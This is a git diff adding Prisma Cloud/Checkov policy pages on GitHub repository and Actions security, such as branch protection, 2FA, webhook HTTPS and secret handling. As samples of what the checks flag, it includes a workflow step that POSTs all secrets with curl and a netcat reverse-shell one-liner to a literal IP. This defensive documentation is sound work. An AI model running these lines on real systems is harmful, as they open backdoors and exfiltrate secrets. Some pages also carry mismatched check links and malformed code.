Actions curl includes secrets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eee86014-e192-45fd-bcd4-a236421ae7fb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/SuspectCurlInScript.py[CKV_GHA_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +If a secret is present in a workflow and a bad actor can modify the GitHub Action, they can send the secret to a website they own via curl.
+ +=== Fix - Buildtime + + +*GitHub Actions* + + +Block and remove code that attempts to exfiltrate secrets. + +[source,yaml] +---- + run: | +- echo "${{ toJSON(secrets) }}" > .secrets +- curl -X POST -s --data "@.secrets" /dev/null +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc new file mode 100644 index 000000000..d66da59cd --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc @@ -0,0 +1,44 @@ +== GitHub Actions Netcat is being used with IP address +// Suspicious use of netcat with IP address + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d375f163-8b32-4b0c-91a8-baf491c9b6a6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ReverseShellNetcat.py[CKV_GHA_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description + +Netcat in combination with an IP address can be used to establish a connection to an external computer or server. This can be used to open up backdoor access or exfiltrate data. + +=== Fix - Buildtime + + +*GitHub Actions* + + +Block and remove code that attempts to make a connection over a network.
+ +[source,yaml] +---- +- rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc new file mode 100644 index 000000000..208d78a8a --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc @@ -0,0 +1,33 @@ +== GitHub repository has less than 2 admins +// GitHub repository has less than 2 administrators + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 198e1833-37dc-4eee-8c42-e526a3f9dad5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/repository_collaborators.py[CKV_GITHUB_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Having two or more admins allows for failover if an admin is busy and for checks between admins. +Ensure you have at least two admins for every repository. 
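One way to audit this policy is to count collaborators whose permission set includes `admin`, as returned by GitHub's `GET /repos/{owner}/{repo}/collaborators` REST endpoint. A minimal sketch (the sample data below is illustrative; a real audit would fetch the collaborator list with an authenticated request):

```python
def count_admins(collaborators):
    """Count collaborators whose GitHub permissions include admin access."""
    return sum(1 for c in collaborators if c.get("permissions", {}).get("admin"))

# Illustrative API-shaped sample: two admins, one writer
sample = [
    {"login": "alice", "permissions": {"admin": True, "push": True, "pull": True}},
    {"login": "bob", "permissions": {"admin": True, "push": True, "pull": True}},
    {"login": "carol", "permissions": {"admin": False, "push": True, "pull": True}},
]
print(count_admins(sample) >= 2)  # True: repository satisfies the two-admin policy
```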
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc new file mode 100644 index 000000000..ba4b5b404 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc @@ -0,0 +1,37 @@ +== GitHub branch protection rules are not enforced on administrators +// GitHub branch protection rules not enforced on administrators + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 075a8621-891b-478d-98dd-cddd90d035fa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/enforce_branch_protection_admins.py[CKV_GITHUB_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +By default, branch protection rules do not apply to admins, allowing them to potentially bypass many of the implemented safeguards. This makes both the admins and their accounts a greater liability. + +Enforce branch protection rules on admins to ensure safeguards are in place for all users. 
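When branch protection is managed as code with Terraform's GitHub provider, this maps to the `enforce_admins` argument on `github_branch_protection`. A minimal sketch (repository and branch names are illustrative):

```hcl
resource "github_branch_protection" "main" {
  repository_id = "example-repo"   # illustrative repository
  pattern       = "main"

  enforce_admins = true            # apply protection rules to administrators too
}
```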
+ + +//image::a07f1a0-Screen_Shot_2022-08-19_at_5.13.12_PM.png diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc new file mode 100644 index 000000000..2becc7912 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc @@ -0,0 +1,52 @@ +== GitHub Actions Environment Secrets are not encrypted +// GitHub Actions Environment Secrets not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5b6b0289-e698-4aa1-9a31-c7e03c6ff016 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/SecretsEncrypted.py[CKV_GIT_4] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In the GitHub Terraform provider, there is an optional field to include a plaintext string of the secret. +If this is checked into code, it will expose the secret. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_actions_environment_secret, github_actions_organization_secret, github_actions_secret +* *Attribute:* plaintext_value + +[source,hcl] +---- +resource "github_actions_environment_secret" "test_secret" { + +...
+- plaintext_value = "example%value" +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc new file mode 100644 index 000000000..c91df2ff1 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection does not dismiss stale reviews + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ca9f8620-6228-4f95-bbf9-ef1c586cfdaa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/dismiss_stale_reviews.py[CKV_GITHUB_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +By default, PR reviews remain when a new commit is pushed. +However, a commit can bring things out of compliance. +Dismissing reviews after a commit ensures reviews are still relevant. 
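In Terraform's GitHub provider, stale-review dismissal maps to `dismiss_stale_reviews` inside the `required_pull_request_reviews` block of `github_branch_protection`. A minimal sketch (repository and branch names are illustrative):

```hcl
resource "github_branch_protection" "main" {
  repository_id = "example-repo"   # illustrative repository
  pattern       = "main"

  required_pull_request_reviews {
    dismiss_stale_reviews = true   # invalidate approvals when new commits are pushed
  }
}
```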
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc new file mode 100644 index 000000000..367315e4c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc @@ -0,0 +1,32 @@ +== GitHub branch protection does not require code owner reviews + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8ea50a5c-58cb-4f0f-b876-d3d61f666e95 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_code_owner_reviews.py[CKV_GITHUB_13] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Branch protections can require code owner reviews for code changes. +This means that pull requests must have approval from a code owner before merging. 
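In Terraform's GitHub provider, this corresponds to `require_code_owner_reviews` inside the `required_pull_request_reviews` block of `github_branch_protection`; the code owners themselves are defined in a CODEOWNERS file in the repository. A minimal sketch (repository and branch names are illustrative):

```hcl
resource "github_branch_protection" "main" {
  repository_id = "example-repo"      # illustrative repository
  pattern       = "main"

  required_pull_request_reviews {
    require_code_owner_reviews = true # PRs need approval from a matching code owner
  }
}
```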
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc new file mode 100644 index 000000000..f2c8bfbf6 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc @@ -0,0 +1,31 @@ +== GitHub branch protection does not require conversation resolution + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e724920f-a26d-40f2-a64d-5f50cb3167c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_conversation_resolution.py[CKV_GITHUB_16] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +This branch protection rule requires that all comments on a pull request are addressed or acknowledged, ensuring that all reviewers' concerns are resolved before the code is merged.
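In recent versions of Terraform's GitHub provider this is expressed with the `require_conversation_resolution` argument on `github_branch_protection` (argument name assumed from current provider versions; verify against the provider you use). A minimal sketch with illustrative names:

```hcl
resource "github_branch_protection" "main" {
  repository_id = "example-repo"          # illustrative repository
  pattern       = "main"

  require_conversation_resolution = true  # all PR conversations must be resolved
}
```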
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc new file mode 100644 index 000000000..887f026c6 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc @@ -0,0 +1,32 @@ +== GitHub branch protection does not require push restrictions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 877ba140-6c1c-406f-970f-57ce75464559 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_push_restrictions.py[CKV_GITHUB_17] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +This branch protection rule ensures that only specific users are able to merge code to a repository. +This prevents code from bypassing checks and being merged without proper review. 
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc new file mode 100644 index 000000000..f83657526 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection does not require status checks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 13dc71bf-f21c-4cab-b593-71fdc1293de4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_status_checks_pr.py[CKV_GITHUB_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Requiring status checks means that all required CI jobs must pass for code to be merged. +This is especially important when your status checks include security reviews that must pass before merging the code. +This requirement can be found in the branch protection policies of your repository. 
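In Terraform's GitHub provider, required status checks map to the `required_status_checks` block of `github_branch_protection`. A minimal sketch (repository, branch, and check names are illustrative):

```hcl
resource "github_branch_protection" "main" {
  repository_id = "example-repo"   # illustrative repository
  pattern       = "main"

  required_status_checks {
    strict   = true                # branch must be up to date before merging
    contexts = ["ci/build"]        # illustrative required check name
  }
}
```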
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc new file mode 100644 index 000000000..3ebee8038 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc @@ -0,0 +1,34 @@ +== GitHub branch protection does not restrict who can dismiss a PR +// GitHub branch protection does not restrict who can dismiss a Pull Request (PR) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 549f1c63-1137-4dd5-8cd2-3a8a913b338c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/restrict_pr_review_dismissal.py[CKV_GITHUB_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Dismissing a pull request review lets you clear irrelevant or outdated reviews. +However, it also makes it possible to dismiss a review that is blocking the merge. +Branch protection rules allow you to restrict who can dismiss reviews to a limited subset of users or teams.
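The restriction can be sketched in Terraform, assuming the `integrations/github` provider's `github_branch_protection` resource; the user reference is illustrative:

[source,hcl]
----
resource "github_branch_protection" "example" {
  repository_id = github_repository.example.node_id
  pattern       = "main"

  required_pull_request_reviews {
    # Only the listed actors may dismiss pull request reviews
    restrict_dismissals    = true
    dismissal_restrictions = [data.github_user.team_lead.node_id]
  }
}
----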
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc new file mode 100644 index 000000000..11eb34fcb --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-does-not-allow-deletions.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection rules allow branch deletions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3fc8cf08-de13-4692-a511-3f78d097e6e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_branch_deletions.py[CKV_GITHUB_18] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +By default, protected branches cannot be deleted. +This behavior can be overridden in the branch protection rules, but it should not be: a single human mistake could then delete an important branch.
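In Terraform, a minimal sketch of the safe configuration, assuming the `integrations/github` provider's `github_branch_protection` resource (where `allows_deletions` already defaults to `false`):

[source,hcl]
----
resource "github_branch_protection" "example" {
  repository_id = github_repository.example.node_id
  pattern       = "main"

  # Keep the default; setting this to true would allow the protected
  # branch to be deleted
  allows_deletions = false
}
----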
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc new file mode 100644 index 000000000..1f0bafe11 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-linear-history.adoc @@ -0,0 +1,35 @@ +== GitHub branch protection rules do not require linear history + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6d5d6f66-e407-4992-8073-136b0b04154e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_linear_history.py[CKV_GITHUB_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Ensure your team keeps a strictly linear history, using squash merges and rebase merges, to make the development history easier to follow. +If your organization allows squash merging or rebase merging, you can https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/defining-the-mergeability-of-pull-requests/about-protected-branches#require-linear-history[enable linear history] from the branch protection menu.
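The setting can also be expressed in Terraform. A minimal sketch, assuming the `integrations/github` provider's `github_branch_protection` resource:

[source,hcl]
----
resource "github_branch_protection" "example" {
  repository_id = github_repository.example.node_id
  pattern       = "main"

  # Block merge commits; only squash or rebase merges keep history linear
  required_linear_history = true
}
----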
+ + +//image::caefc3a-Screen_Shot_2022-08-19_at_5.14.45_PM.png diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc new file mode 100644 index 000000000..710f9644a --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-rules-requires-signed-commits.adoc @@ -0,0 +1,50 @@ +== GitHub branch protection rules do not require signed commits + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 362c7490-7e2d-453b-b1f0-288c1eb059c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] + +|Severity +|MEDIUM + +|Subtype
+|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitHub, Branch Protection Rules define whether collaborators can delete or force push to the branch and set requirements for any pushes to the branch, such as passing status checks or a linear commit history. +When you enable required commit signing on a branch, contributors and bots can only push commits that have been signed and verified to the branch. +If a collaborator pushes an unsigned commit to a branch that requires commit signatures, the collaborator will need to rebase the commit to include a verified signature, then force push the rewritten commit to the branch. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_branch_protection, github_branch_protection_v3 +* *Attribute:* require_signed_commits + +[source,hcl] +---- +resource "github_branch_protection_v3" "example" { + +... + require_signed_commits = true
+} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc new file mode 100644 index 000000000..59c6c0a43 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-and-repository-webhooks-are-using-https.adoc @@ -0,0 +1,61 @@ +== GitHub repository webhooks do not use HTTPS +// GitHub repository webhooks do not use HTTPS protocol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6873d72-f7a6-43b7-ac45-ffcf21f77d80 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_repos.py[CKV_GITHUB_7] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Webhooks can be configured to use endpoints of your choosing, including whether TLS is enabled or not. +Ensure you are using a webhook endpoint with encryption by using a standard HTTPS URL. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository_webhook +* *Attribute:* insecure_ssl + + +[source,go] +---- +{ + "resource "github_repository_webhook" "foo" { +...
+ configuration { +- url = "http://google.com/" ++ url = "https://google.com/" + insecure_ssl = false + } + + +}", + +} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc new file mode 100644 index 000000000..fa50eac59 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc @@ -0,0 +1,51 @@ +== GitHub organization security settings do not have IP allow list enabled +// GitHub organization security settings 'IP allow list' not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7edea6c3-5984-426d-9e64-a4de1ab20395 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/ipallowlist.py[CKV_GITHUB_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks
+|VCS + +|=== + + + +=== Description + + +In GitHub Enterprise Cloud and GitHub AE, you can restrict access to organization assets by configuring an allow list for specific IP addresses. +For example, it is possible to allow access from only the IP address of a trusted CIDR. +The allow list for IP addresses will block access via the web, API, and Git from any IP addresses that are not on the allow list. + + +=== Fix - Buildtime + + + +*GitHub* + + + +. Go to your organization page on GitHub + +. Click on Settings and then Security + +. In the IP allowlist section, click on Enable IP allowlist + +. 
Add the IP addresses and ranges that you want to allow access to your organization's resources diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc new file mode 100644 index 000000000..698de518c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-2fa.adoc @@ -0,0 +1,47 @@ +== GitHub organization security settings do not include 2FA capability +// GitHub organization security settings not configured to require two-factor authentication (2FA) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3bc31e9c-5f8d-4f59-80db-779c2f88c5b3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/2fa.py[CKV_GITHUB_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Organization owners can require organization members, outside collaborators, and billing managers to enable two-factor authentication for their personal accounts, making it harder for malicious actors to access an organization's repositories and settings. + +=== Fix - Buildtime + + +*GitHub Enforce two-factor authentication:* + + + +. In the top right corner of GitHub.com, click your profile photo, then click Your organizations. + +. Next to the organization, click Settings. + +. In the "Security" section of the sidebar, click Authentication security. + +. Under "Authentication", select Require two-factor authentication for everyone in your organization, then click Save. 
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc new file mode 100644 index 000000000..3af3066bd --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-security-settings-require-sso.adoc @@ -0,0 +1,65 @@ +== GitHub organization security settings do not include SSO +// GitHub organization security settings not configured to require SAML single sign on (SSO) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2b09ba2-7ac2-4c00-b0a2-1913f11c0d79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/sso.py[CKV_GITHUB_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Organization owners and admins can enforce SAML SSO so that all organization members must authenticate via an identity provider (IdP). +You can also enforce SAML SSO for your organization. +When you enforce SAML SSO, all members of the organization must authenticate through your IdP to access the organization's resources. +Enforcement removes any members and administrators who have not authenticated via your IdP from the organization. +GitHub sends an email notification to each removed user. + +=== Fix - Buildtime + + +*GitHub Enforce SAML SSO for your organization* + + + +. Enable and test SAML SSO for your organization, then authenticate with your IdP at least once. ++ +For more information, see "Enabling and testing SAML single sign-on for your organization." + +. Prepare to enforce SAML SSO for your organization. ++ +For more information, see "Preparing to enforce SAML single sign-on in your organization." + +. 
In the top right corner of GitHub.com, click your profile photo, then click Your organizations. ++ +Your organizations in the profile menu + +. Next to the organization, click Settings. + +. In the "Security" section of the sidebar, click Authentication security. + +. Under "SAML single sign-on", select Require SAML SSO authentication for all members of the organization. + +. Under "Single sign-on recovery codes", review your recovery codes. ++ +Store the recovery codes in a safe location like a password manager. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc new file mode 100644 index 000000000..7e1040de7 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-organization-webhooks-are-using-https.adoc @@ -0,0 +1,33 @@ +== GitHub organization webhooks do not use HTTPS +// GitHub organization webhooks do not use HTTPS protocol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 781e9d63-f3da-4c74-b22c-b657c6d2dc3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_orgs.py[CKV_GITHUB_6] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Webhooks can be configured to use endpoints of your choosing, including whether TLS is enabled or not. +Ensure you are using a webhook endpoint with encryption by using a standard HTTPS URL.
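There is no Fix section on this page, but a buildtime fix can be sketched in Terraform, assuming the `integrations/github` provider's `github_organization_webhook` resource; the URL and event list are illustrative:

[source,hcl]
----
resource "github_organization_webhook" "example" {
  active = true
  events = ["push"]

  configuration {
    url          = "https://example.com/events" # HTTPS, not plain HTTP
    content_type = "json"
    insecure_ssl = false # verify the endpoint's TLS certificate
  }
}
----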
diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc new file mode 100644 index 000000000..ab7109715 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-has-vulnerability-alerts-enabled.adoc @@ -0,0 +1,50 @@ +== GitHub Repository doesn't have vulnerability alerts enabled +// GitHub Repository vulnerability alerts disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 51f91ec7-cc58-4c5c-9dfe-7eb5b581685e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py[CKV_GIT_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +GitHub has the ability to scan dependencies for vulnerabilities. +To enable this for a repository, you must also enable it at the owner level. +By default, this is enabled for public repos but not for private repos.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository +* *Attribute:* vulnerability_alerts + +[source,hcl] +---- +resource "github_repository" "example" { + vulnerability_alerts = true +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc new file mode 100644 index 000000000..52da44faf --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-repository-is-private.adoc @@ -0,0 +1,45 @@ +== GitHub Repository is Public + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f620ff53-e5d6-45a1-b68b-83bc35f7e946 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/PrivateRepo.py[CKV_GIT_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +=== Description + + +GitHub allows you to set a repository to private to prevent unauthorized users from viewing the repository. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_repository +* *Attribute:* private OR visibility (The visibility parameter overrides the private parameter) + +[source,go] +---- +resource "github_repository" "example" { + +...
+ private = true +# or: +# visibility = "private" +} +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc new file mode 100644 index 000000000..7181d41d8 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/github-policies.adoc @@ -0,0 +1,103 @@ +== GitHub Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-2-admins-are-set-for-each-repository.adoc[GitHub repository has less than 2 admins] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/repository_collaborators.py[CKV_GITHUB_9] +|LOW + + +|xref:ensure-branch-protection-rules-are-enforced-on-administrators.adoc[GitHub branch protection rules are not enforced on administrators] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/enforce_branch_protection_admins.py[CKV_GITHUB_10] +|LOW + + +|xref:ensure-github-actions-secrets-are-encrypted.adoc[GitHub Actions Environment Secrets are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/SecretsEncrypted.py[CKV_GIT_4] +|HIGH + + +|xref:ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc[GitHub branch protection does not dismiss stale reviews] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/dismiss_stale_reviews.py[CKV_GITHUB_11] +|LOW + + +|xref:ensure-github-branch-protection-requires-codeowner-reviews.adoc[GitHub branch protection does not require code owner reviews] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_code_owner_reviews.py[CKV_GITHUB_13] +|LOW + + +|xref:ensure-github-branch-protection-requires-conversation-resolution.adoc[GitHub branch protection does not require conversation resolution] +| 
